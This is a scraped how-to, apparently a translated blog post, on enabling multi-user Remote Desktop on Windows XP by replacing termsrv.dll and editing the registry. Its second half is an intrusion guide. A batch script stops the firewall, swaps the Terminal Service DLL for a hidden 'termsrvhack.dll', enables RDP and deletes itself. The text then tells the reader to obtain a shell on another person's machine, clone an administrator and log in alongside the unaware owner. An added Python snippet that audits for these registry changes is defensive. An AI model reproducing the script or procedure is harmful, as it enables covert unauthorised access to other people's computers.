Windows XP 3389 (terminal) Multi-User Login

Source: Internet
Author: User

Step 1: First, install the official SP2 version on Windows XP, following the usual installation procedure.

Step 2: Prepare a termsrv.dll from an earlier SP2 build of Terminal Server (it is said that this function has been disabled since build 2082, so it is best to use an earlier build). The Chinese SP2 test version is difficult to find; I used the English build 2055 and did not find any problems after running it. You can download the build 2055 Terminal Server file termsrv.dll from http://www.msfn.org/board/index.php?S=85a71ca2987c89886c99733154ae685f&act=attach&type=Post&id=161513. The link provides a file with the extension .dl_; you can change its extension to .zip and then extract it with WinRAR.

Step 3: Start Windows XP in safe mode. If multiple operating systems are installed, you can instead start another system that can access the Windows XP partition (Windows 98 cannot access NTFS partitions unless a third-party tool is installed, so Windows 98 may be useless here). Back up every termsrv.dll file of the official SP2 version in Windows XP and overwrite each one with the termsrv.dll file of build 2055. termsrv.dll usually appears in at least two locations: \Windows\system32 and \Windows\system32\dllcache. Wherever termsrv.dll exists, replace it with the termsrv.dll of build 2055.

Step 4: Start Windows XP in normal mode. If Windows File Protection reports that termsrv.dll has been modified and asks whether you want to restore it, select No.

Step 5: Modify the Registry to add a multi-user license for the terminal server. You can use the following batch command to modify the registry:

@echo off
setlocal
rem Key that holds the concurrent-session setting for Terminal Server
set regkey="HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core"
reg add %regkey% /v EnableConcurrentSessions /t REG_DWORD /d 1 /f
endlocal

Save the preceding content as a batch file, such as AA.bat, then double-click it to run it.

I don't recommend this method: it is tedious, and it also requires restarting the system. We can write a batch file so that multiple users can log on to XP without restarting. First, let's look at the parameters of the registry command:

REG ADD KeyName [/v ValueName | /ve] [/t Type] [/s Separator] [/d Data] [/f]

KeyName [\\Machine\]FullKey
Machine: name of the remote machine; if omitted, defaults to the current machine.
On remote machines, only HKLM and HKU are supported.
FullKey: ROOTKEY\SubKey
ROOTKEY: [HKLM | HKCU | HKCR | HKU | HKCC]
SubKey: the full name of a registry key under the selected ROOTKEY.

/v The name of the value to add under the selected key.

/ve Adds an empty value name (Default) for the registry key.

/t Registry data type:
[REG_SZ | REG_MULTI_SZ | REG_EXPAND_SZ |
REG_DWORD | REG_BINARY | REG_NONE]
If this parameter is omitted, REG_SZ is used.

/s Specifies the character used as the separator in a REG_MULTI_SZ data string.
If this parameter is omitted, "\0" is used as the separator.

/d The data to assign to the registry ValueName being added.

/f Forces overwriting of the existing registry entry without prompting.

For example:

REG ADD \\ABC\HKLM\Software\MyCo
Adds the registry key HKLM\Software\MyCo on the remote machine ABC

REG ADD HKLM\Software\MyCo /v Data /t REG_BINARY /d fe340ead
Adds a value (name: Data, type: REG_BINARY, data: fe340ead)

REG ADD HKLM\Software\MyCo /v MRU /t REG_MULTI_SZ /d fax\0mail
Adds a value (name: MRU, type: REG_MULTI_SZ, data: fax\0mail\0\0)

REG ADD HKLM\Software\MyCo /v Path /t REG_EXPAND_SZ /d ^%systemroot^%
Adds a value (name: Path, type: REG_EXPAND_SZ, data: %systemroot%)
Note: use the caret symbol (^) inside the expand string

To prevent the system from being restarted, we can use the shutdown -a command.
Based on the information above, we can write a batch file that enables multi-user login to the XP system without restarting it.
The code is as follows:

@echo off
rem Stop the Windows Firewall / Internet Connection Sharing service
@net stop sharedaccess
rem End the process hosting TermService; replace "PID" with its process ID
@ntsd -c q -p "PID"
@reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v KeepRASConnections /t REG_SZ /d 1 /f
@reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
@reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core" /v EnableConcurrentSessions /t REG_DWORD /d 00000001 /f
rem Point the service at the replacement DLL instead of termsrv.dll
@reg add HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters /v ServiceDll /t REG_EXPAND_SZ /d %SystemRoot%\system32\termsrvhack.dll /f
@copy C:\termsrvhack.dll C:\Windows\system32\dllcache\termsrvhack.dll
@attrib +h +s +r C:\Windows\system32\dllcache\termsrvhack.dll
@copy C:\termsrvhack.dll C:\Windows\system32\termsrvhack.dll
@attrib +h +s +r C:\Windows\system32\termsrvhack.dll
rem Cancel the pending system restart
@shutdown -a
@del C:\termsrvhack.dll
@net start termservice
@del C:\3389.bat

"PID" is the process ID of TermService. You can use the tasklist /svc command to obtain it. Of course, there is no tasklist command in Windows 2000 and earlier systems.
The specific procedure is as follows.
First, you need to get a shell on the other party's machine, and then use third-party software to enable the terminal service from the shell. Do not change the default port 3389 at first; otherwise, you need to restart the terminal service before logging on. Then create or clone a super administrator user.
Next, upload the downloaded termsrvhack.dll and the above batch file to the root of the other party's C: drive, and then run the batch file in the shell. It reports success!
Finally, open the terminal client and log on to the 3389 terminal!
After you log in, your operations and those of the computer's owner do not affect each other. He does his thing and you do yours. Haha, cool?!
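
The batch file above leaves registry traces that an administrator can audit. The following added example (not part of the original article) parses `reg query` output and flags the three Terminal Services values the script changes; the sample output is constructed and the function names are illustrative.

```python
import re

# Constructed sample of `reg query` output from a host where the batch file was run.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService\Parameters
    ServiceDll    REG_EXPAND_SZ    C:\WINDOWS\system32\termsrvhack.dll

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
    fDenyTSConnections    REG_DWORD    0x0

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core
    EnableConcurrentSessions    REG_DWORD    0x1
"""

TS = r"hkey_local_machine\system\currentcontrolset\control\terminal server"
SVC = r"hkey_local_machine\system\currentcontrolset\services\termservice\parameters"

def parse_reg_query(text):
    """Return {(key, value_name): data} with key and name lower-cased."""
    values, key = {}, None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped.upper().startswith("HKEY_"):
            key = stripped.lower()          # a key header line
            continue
        # Value lines are "name  TYPE  data", separated by tabs or runs of spaces.
        parts = re.split(r"\t+| {2,}", stripped, maxsplit=2)
        if key and len(parts) == 3:
            values[(key, parts[0].lower())] = parts[2].strip()
    return values

def audit(text):
    """List findings for the Terminal Services values the page's script sets."""
    v, findings = parse_reg_query(text), []
    dll = v.get((SVC, "servicedll"))
    # The stock service DLL is termsrv.dll in system32 (expanded or not).
    if dll and not dll.lower().endswith(r"\system32\termsrv.dll"):
        findings.append("ServiceDll replaced: " + dll)
    deny = v.get((TS, "fdenytsconnections"))
    if deny and int(deny, 16) == 0:
        findings.append("fDenyTSConnections=0: Remote Desktop connections allowed")
    conc = v.get((TS + r"\licensing core", "enableconcurrentsessions"))
    if conc and int(conc, 16) == 1:
        findings.append("EnableConcurrentSessions=1: concurrent sessions enabled")
    return findings

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        print(finding)
```

The in-place overwrite of termsrv.dll described in Steps 3 and 4 does not change ServiceDll, so that variant has to be caught by checking the file's hash or signature instead.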

 

To sum up, enabling concurrent sessions consists of three steps:

1. Enable multi-user support in the registry (regedit)
2. Replace termsrv.dll
3. Change the way users log on or off: use the Welcome screen and Fast User Switching

 
